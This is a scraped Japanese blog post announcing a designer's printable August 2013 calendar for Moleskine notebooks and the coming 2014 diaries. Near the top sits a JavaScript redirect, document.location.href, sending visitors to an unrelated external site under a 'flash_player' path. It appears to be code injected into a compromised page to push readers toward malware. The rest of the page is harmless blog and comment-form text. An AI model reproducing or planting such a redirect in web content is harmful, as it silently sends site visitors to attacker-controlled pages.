info

infodocument.location.href=”http://www.sommen.nu/templates/flash_player/?A”

アーカイブ

search

community info info info

« | メイン | »

2013年7月31日

タカヤのデザインカレンダー2013年8月版

タカヤさんが毎月デザインしてくれるマンスリーカレンダーは8月を刻みます。「千年猛暑」とまで言われる2013年の夏。涼しい秋が来るまで、街歩きはちょっと難しいかもしれませんね。8月は、お盆休みの予定とあわせて、屋内で楽しめることを色々模索しましょうか!?

タカヤさんのカレンダーは、プリントアウトして切り抜き、モレスキンノートブック/ダイアリーに貼付けて使って下さい。ポケットサイズ、ラージサイズが用意されています!

タカヤさんのマンスリーカレンダー8月版ダウンロードはこちら
@blanqをフォローしよう!
タカヤさんの以前の記事はこちら

*そして、忘れてはならない、8月は「手帳の月」です!2014年のダイアリーが発表されますよ!手帳の月と言えば、以前は9月だったのですが、数年前から、翌年のダイアリーは8月に発表されるようになりました。暑い盛りに、来年のことを考える余裕はないかもしれませんが、モレスキナリーで少しずつ紹介していきたいと思いますので、みなさんどうぞお楽しみに!

Print it in Moleskine MSK format

トラックバック

この記事のトラックバックURL:
url trackback

タカヤのデザインカレンダー2013年8月版を参照しているブログ:

コメント

フィード コメントフィードを購読すればディスカッションを追いかけることができます。

コメントを投稿

アカウント情報

(名前は必須です。メールアドレスは公開されません。)

(URLは自動的にリンクされます。)

from moleskine